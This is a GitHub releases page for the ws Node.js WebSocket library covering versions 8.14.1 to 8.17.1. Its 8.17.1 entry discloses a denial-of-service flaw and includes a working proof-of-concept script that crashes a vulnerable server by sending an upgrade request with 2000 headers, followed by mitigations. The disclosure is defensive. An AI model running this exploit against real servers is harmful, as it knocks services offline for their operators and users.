Skip to content

Releases: websockets/ws

8.17.1

16 Jun 14:09
Compare
Choose a tag to compare

Bug fixes

  • Fixed a DoS vulnerability (#2231).

A request with a number of headers exceeding theserver.maxHeadersCount
threshold could be used to crash a ws server.

const http = require('http');
const WebSocket = require('ws');

const wss = new WebSocket.Server({ port: 0 }, function () {
  const chars = "!#$%&'*+-.0123456789abcdefghijklmnopqrstuvwxyz^_`|~".split('');
  const headers = {};
  let count = 0;

  for (let i = 0; i < chars.length; i++) {
    if (count === 2000) break;

    for (let j = 0; j < chars.length; j++) {
      const key = chars[i] + chars[j];
      headers[key] = 'x';

      if (++count === 2000) break;
    }
  }

  headers.Connection = 'Upgrade';
  headers.Upgrade = 'websocket';
  headers['Sec-WebSocket-Key'] = 'dGhlIHNhbXBsZSBub25jZQ==';
  headers['Sec-WebSocket-Version'] = '13';

  const request = http.request({
    headers: headers,
    host: '127.0.0.1',
    port: wss.address().port
  });

  request.end();
});

The vulnerability was reported by Ryan LaPointe in #2230.

In vulnerable versions of ws, the issue can be mitigated in the following ways:

  1. Reduce the maximum allowed length of the request headers using the
    --max-http-header-size=size and/or the maxHeaderSize options so
    that no more headers than the server.maxHeadersCount limit can be sent.
  2. Set server.maxHeadersCount to 0 so that no limit is applied.

7.5.10

16 Jun 12:50
Compare
Choose a tag to compare

Bug fixes

6.2.3

16 Jun 13:21
Compare
Choose a tag to compare

Bug fixes

5.2.4

16 Jun 12:43
Compare
Choose a tag to compare

Bug fixes

8.17.0

28 Apr 05:49
Compare
Choose a tag to compare

Features

  • The WebSocket constructor now accepts the createConnection option (#2219).

Other notable changes

  • The default value of the allowSynchronousEvents option has been changed to
    true (#2221).

This is a breaking change in a patch release. The assumption is that the option
is not widely used.

8.16.0

26 Dec 15:33
Compare
Choose a tag to compare

Features

  • Added the autoPong option (01ba54e).

8.15.1

12 Dec 18:19
Compare
Choose a tag to compare

Notable changes

  • The allowMultipleEventsPerMicrotask option has been renamed to
    allowSynchronousEvents (4ed7fe5).

This is a breaking change in a patch release that could have been avoided with
an alias, but the renamed option was added only 3 days ago, so hopefully it
hasn't already been widely used.

8.15.0

09 Dec 14:51
Compare
Choose a tag to compare

Features

  • Added the allowMultipleEventsPerMicrotask option (93e3552).

8.14.2

19 Sep 15:29
Compare
Choose a tag to compare

Bug fixes

  • Fixed an issue that allowed errors thrown by failed assertions to be
    swallowed when running tests (7f4e1a7).

8.14.1

08 Sep 16:17
Compare
Choose a tag to compare

Bug fixes

  • Improved the reliability of two tests for CITGM (fd3c64c).